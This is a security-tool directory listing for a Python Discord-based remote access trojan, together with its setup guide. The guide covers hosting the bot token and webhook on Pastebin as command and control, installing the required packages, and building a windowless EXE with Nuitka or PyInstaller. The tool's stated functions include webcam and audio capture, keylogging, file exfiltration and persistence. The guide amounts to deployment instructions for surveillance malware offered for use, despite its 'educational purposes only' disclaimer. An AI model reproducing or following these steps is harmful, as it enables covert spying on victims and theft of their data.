Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Discord-Rat — Python-based Discord RAT with remote command panel for webcam capture, audio recording, keylogging, file exfiltration, and persistence via Discord bot and webhook C2. | Kitploit
Tools/GitHubGitHub/gmh5225/discord-rat
Encryption/Decryption ToolsPersistence MechanismsData ExfiltrationPost-ExploitationMalware AnalysisPrivacyCommand and ControlRed TeamingPayload DevelopmentRemote Access Trojan
GitHubgmh5225/discord-rat
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Discord-Rat

Python-based Discord RAT with remote command panel for webcam capture, audio recording, keylogging, file exfiltration, and persistence via Discord bot and webhook C2.

View RepositoryWebsite

discord

root@kitploit:~
       For educational purposes only!!
         Discord Rat - Setup Guide

Author : @deadconvicess | Packaged By: #deadconvicess License : MIT

WHAT YOU NEED

  1. Python 3.11+ Installed
  2. A Discord Bot Token (https://discord.com/developers/applications)
  3. A Discord Webhook URL (Discord Channel > Integrations > Webhooks)
  4. Pastebin or Gist account for hosting config

SETUP INSTRUCTIONS

  1. Create a Pastebin/Gist with: Line 1: Your Discord Bot Token Line 2: Your Discord Webhook URL

  2. Make sure it's RAW viewable (Unlisted or Public)

  3. Copy the RAW link and paste it into Rat.py: Example: config_url = "https://pastebin.com/raw/YourPasteID"

  4. Install the required packages: pip install -r requirements.txt OR manually install: pip install discord requests pypiwin32 pycaw comtypes opencv-python numpy sounddevice scipy pyautogui pynput cryptography pycryptodome pillow aiofiles pyttsx3

  5. Run the bot: python Rat.pyw

OPTIONAL: BUILDING EXE

For No Console Window:

  • Nuitka: pip install nuitka
  • Nuitka --onefile --windows-console-mode=disable Rat.py
  • OR
  • PyInstaller: pip install pyinstaller
  • Pyinstaller --onefile --noconsole Rat.py

DISCORD COMMAND PANEL

Once bot is running, type: .help To view available commands.

TROUBLESHOOTING

  • Check bot token and webhook are valid and accessible
  • Ensure all packages are installed
  • Make sure you used a RAW Pastebin/Gist link

ENJOY USING VANISH RAT 1.0

For educational purposes only!!

Download Tool